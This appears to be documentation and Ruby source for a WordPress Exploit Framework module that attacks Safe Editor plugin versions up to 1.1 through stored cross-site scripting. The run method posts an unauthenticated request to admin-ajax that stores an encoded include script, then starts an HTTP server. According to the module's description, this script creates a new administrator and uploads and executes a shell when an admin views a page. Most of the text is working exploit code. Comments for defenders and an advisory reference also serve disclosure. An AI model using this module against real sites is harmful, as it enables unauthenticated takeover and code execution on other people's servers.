class Wpxf::Exploit::SafeEditorXssShellUpload

Public Class Methods

new()
Calls superclass method Wpxf::WordPress::Xss::new
# File lib/wpxf/modules/exploit/xss/stored/safe_editor_xss_shell_upload.rb, line 6
# Builds the module and registers its descriptive metadata.
#
# Runs the superclass constructor first, then hands update_info the module's
# name, description, credits, advisory reference and disclosure date.
#
# For defenders: the description states that Safe Editor releases <= 1.1 are
# affected and that no authentication is needed to store the script. The
# advisory is tracked as WPVDB 8497.
def initialize
  super

  summary = 'This module exploits a lack of user level validation and input ' \
            'sanitization in versions <= 1.1 of the Safe Editor ' \
            'plugin which allows unauthenticated users to store ' \
            'a script that will create a new admin user and use the new ' \
            'credentials to upload and execute a payload when an admin ' \
            'views the page.'

  credits = [
    '@robsat91', # Disclosure
    'rastating'  # WPXF module
  ]

  advisories = [
    ['WPVDB', '8497']
  ]

  update_info(
    name: 'Safe Editor <= 1.1 XSS Shell Upload',
    desc: summary,
    author: credits,
    references: advisories,
    date: 'May 17 2016'
  )
end

Public Instance Methods

check()
# File lib/wpxf/modules/exploit/xss/stored/safe_editor_xss_shell_upload.rb, line 28
# Version check for the target's Safe Editor install.
#
# Delegates to check_plugin_version_from_changelog with the plugin slug, the
# file to read and a version string, and returns whatever that helper returns.
#
# NOTE(review): '1.2' is presumably the first fixed release, which would match
# the "<= 1.1" range in the module description. Confirm against the helper.
# The same readme.txt comparison is what a defender can use to find sites
# that still need the plugin upgraded or removed.
def check
  plugin_slug = 'safe-editor'
  changelog_file = 'readme.txt'
  version_bound = '1.2'

  check_plugin_version_from_changelog(plugin_slug, changelog_file, version_bound)
end
run()
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/xss/stored/safe_editor_xss_shell_upload.rb, line 32
# Executes the module and returns false on any failure.
#
# Steps, in order:
#   1. Bail out with false if the superclass run does not succeed.
#   2. POST the 'se_save' action (type 'js') to the admin AJAX URL, carrying
#      the encoded include script as 'data'.
#   3. Treat a missing response or any status other than 200 as a failure.
#   4. Start the local HTTP server and return the result of xss_shell_success.
#
# For defenders: the request in step 2 is sent without any login step in this
# method, matching the "unauthenticated" wording of the module description.
# POSTs to the AJAX endpoint with action=se_save and type=js from clients that
# hold no session are the observable for this step. A 200 response only shows
# that the request was accepted; this method does not verify what was stored.
def run
  return false unless super

  emit_info 'Storing script...'

  # Read the URL before building the form so helper call order is unchanged.
  target_url = wordpress_url_admin_ajax
  form_fields = {
    'action' => 'se_save',
    'type' => 'js',
    'data' => xss_ascii_encoded_include_script
  }
  response = execute_post_request(url: target_url, body: form_fields)

  failure =
    if response.nil?
      'No response from the target'
    elsif response.code != 200
      "Server responded with code #{response.code}"
    end

  unless failure.nil?
    emit_error failure
    return false
  end

  emit_success 'Script stored and will be executed when a user views a page'
  start_http_server

  xss_shell_success
end